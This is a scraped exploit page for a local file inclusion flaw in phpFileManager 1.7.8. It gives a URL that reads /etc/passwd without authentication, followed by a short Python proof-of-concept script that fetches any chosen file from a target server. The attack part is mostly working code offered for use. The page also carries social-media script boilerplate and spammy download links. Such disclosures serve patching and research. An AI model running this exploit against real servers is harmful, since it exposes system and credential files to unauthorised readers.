Exploit h76.png

Published on April 2nd, 2019 📆 | 6542 Views ⚑

0

phpFileManager 1.7.8 Local File Inclusion

phpFileManager version 1.7.8 suffers from a local file inclusion vulnerability.

MD5 | f47a6582f630e20a6c4444e709ce0680

# Exploit Title: phpFileManager 1.7.8 - Local File Inclusion
# Date: 01.04.2019
# Exploit Author: Murat Kalafatoglu
# Vendor Homepage: https://sourceforge.net/projects/phpfm/
# Software Demo: https://phpfm-demo.000webhostapp.com/
# Version: v1.7.8
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?action=3&fm_current_dir=%2Fetc%2F&filename=passwd

# PoC

#!/usr/bin/python

import requests, sys

print "n[*] phpFileManager 1.7.8 LFI PoC By Murat Kalafatoglu"
print "[+] usage: python " + __file__ + " http://"
if (len(sys.argv) != 2):
print "[*] Usage: poc.py "
exit(0)
ip_add = sys.argv[1]

dr = raw_input('[+] Directory: aka /etc/n')
fd = raw_input('[+] File : aka passwdn')

print "Exploiting....."
print 'n'

exp = requests.get(""+ ip_add + "index.php?action=3&fm_current_dir=" + dr + "&filename=" + fd +"")
print exp.text

(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = “http://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=409115965821184”;
fjs.parentNode.insertBefore(js, fjs);
}(document, ‘script’, ‘facebook-jssdk’));

Premium WordPress Themes Download
Download WordPress Themes Free
Free Download WordPress Themes
Free Download WordPress Themes
download udemy paid course for free

Tagged with:



Leave a Reply ✍


loading...